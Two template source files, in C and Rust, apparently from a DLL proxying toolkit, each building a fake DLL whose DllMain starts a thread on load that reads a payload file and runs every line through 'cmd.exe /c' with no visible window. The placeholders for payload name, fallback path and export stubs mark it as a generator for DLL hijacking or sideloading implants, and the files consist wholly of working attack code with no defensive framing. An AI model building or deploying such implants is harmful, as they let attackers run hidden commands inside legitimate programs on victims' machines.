File: src/dllproxykit/langs/c/fake.c
#define WIN32_LEAN_AND_MEAN
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#ifdef __TINYC__
#include "tcc_compat.h"
#endif
#include <stdint.h>
#include <stdio.h>
#include <wchar.h>

static const wchar_t PAYLOAD_NAME[] = L"__PAYLOAD_NAME__";
static const wchar_t PAYLOAD_FALLBACK[] = L"__PAYLOAD_FALLBACK__";
static wchar_t g_dir[MAX_PATH];

static FILE *open_payload(void)
{
    wchar_t path[MAX_PATH];
    FILE *f;

    _snwprintf(path, MAX_PATH, L"%s\\%s", g_dir, PAYLOAD_NAME);
    f = _wfopen(path, L"rb");
    if (f) {
        return f;
    }
    return _wfopen(PAYLOAD_FALLBACK, L"rb");
}

static void run_one_line(char *line)
{
    wchar_t wcmd[4096];
    wchar_t cmdline[4200];
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    size_t n;

    while (*line == ' ' || *line == '\t') {
        line++;
    }
    n = 0;
    while (line[n]) {
        n++;
    }
    while (n && (line[n - 1] == '\n' || line[n - 1] == '\r' || line[n - 1] == ' ')) {
        line[--n] = 0;
    }
    if (!n) {
        return;
    }
    if (!MultiByteToWideChar(CP_UTF8, 0, line, -1, wcmd, 4096)) {
        return;
    }
    _snwprintf(cmdline, 4200, L"cmd.exe /c %s", wcmd);
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    if (CreateProcessW(NULL, cmdline, NULL, NULL, FALSE,
                       CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hThread);
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
    }
}

static DWORD WINAPI payload_thread(LPVOID unused)
{
    FILE *f;
    char buf[4096];

    (void)unused;
    f = open_payload();
    if (!f) {
        return 0;
    }
    while (fgets(buf, sizeof(buf), f)) {
        run_one_line(buf);
    }
    fclose(f);
    return 0;
}

static void run_payload(void)
{
    HANDLE t = CreateThread(NULL, 0, payload_thread, NULL, 0, NULL);
    if (t) {
        CloseHandle(t);
    }
}

BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved)
{
    (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {
        wchar_t buf[MAX_PATH];
        if (GetModuleFileNameW(hinst, buf, MAX_PATH)) {
            wchar_t *slash = wcsrchr(buf, L'\\');
            if (slash) {
                *slash = 0;
                wcsncpy(g_dir, buf, MAX_PATH);
                g_dir[MAX_PATH - 1] = 0;
            }
        }
        run_payload();
    }
    return TRUE;
}

__STUBS__

File: src/dllproxykit/langs/rust/fake.rs
#![allow(non_snake_case, dead_code, unused_imports)]
use std::ffi::c_void;
use std::fs;
use std::os::windows::process::CommandExt;
use std::path::PathBuf;
use std::process::{Command, Stdio};
use std::sync::OnceLock;

type BOOL = i32;
type DWORD = u32;
type HINSTANCE = *mut c_void;
type LPVOID = *mut c_void;
type LPCWSTR = *const u16;
type LPTHREAD_START_ROUTINE = unsafe extern "system" fn(LPVOID) -> DWORD;

const DLL_PROCESS_ATTACH: DWORD = 1;
const CREATE_NO_WINDOW: u32 = 0x0800_0000;
const PAYLOAD_NAME: &str = "__PAYLOAD_NAME__";
const PAYLOAD_FALLBACK: &str = "__PAYLOAD_FALLBACK__";

#[link(name = "kernel32")]
extern "system" {
    fn GetModuleFileNameW(h: HINSTANCE, buf: *mut u16, size: DWORD) -> DWORD;
    fn CreateThread(
        attr: LPVOID,
        stack: usize,
        start: LPTHREAD_START_ROUTINE,
        param: LPVOID,
        flags: DWORD,
        id: *mut DWORD,
    ) -> *mut c_void;
    fn CloseHandle(h: *mut c_void) -> i32;
}

static DLL_DIR: OnceLock<PathBuf> = OnceLock::new();

fn run_payload(dir: &PathBuf) {
    let local = dir.join(PAYLOAD_NAME);
    let path = if local.is_file() {
        local
    } else {
        PathBuf::from(PAYLOAD_FALLBACK)
    };
    let Ok(text) = fs::read_to_string(path) else { return; };
    for line in text.lines() {
        let line = line.trim();
        if line.is_empty() { continue; }
        let _ = Command::new("cmd.exe")
            .arg("/c")
            .raw_arg(line)
            .creation_flags(CREATE_NO_WINDOW)
            .stdin(Stdio::null())
            .stdout(Stdio::null())
            .stderr(Stdio::null())
            .status();
    }
}

unsafe extern "system" fn payload_thread(_: LPVOID) -> DWORD {
    if let Some(dir) = DLL_DIR.get() {
        run_payload(dir);
    }
    0
}

#[no_mangle]
pub extern "system" fn DllMain(hinst: HINSTANCE, reason: DWORD, _r: LPVOID) -> BOOL {
    if reason == DLL_PROCESS_ATTACH {
        unsafe {
            let mut buf = [0u16; 512];
            let n = GetModuleFileNameW(hinst, buf.as_mut_ptr(), 512);
            if n > 0 {
                let path = String::from_utf16_lossy(&buf[..n as usize]);
                if let Some(parent) = PathBuf::from(&path).parent() {
                    let _ = DLL_DIR.set(parent.to_path_buf());
                }
            }
        }
        let t = unsafe { CreateThread(std::ptr::null_mut(), 0, payload_thread, std::ptr::null_mut(), 0, std::ptr::null_mut()) };
        if !t.is_null() {
            unsafe { CloseHandle(t); }
        }
    }
    1
}

__STUBS__
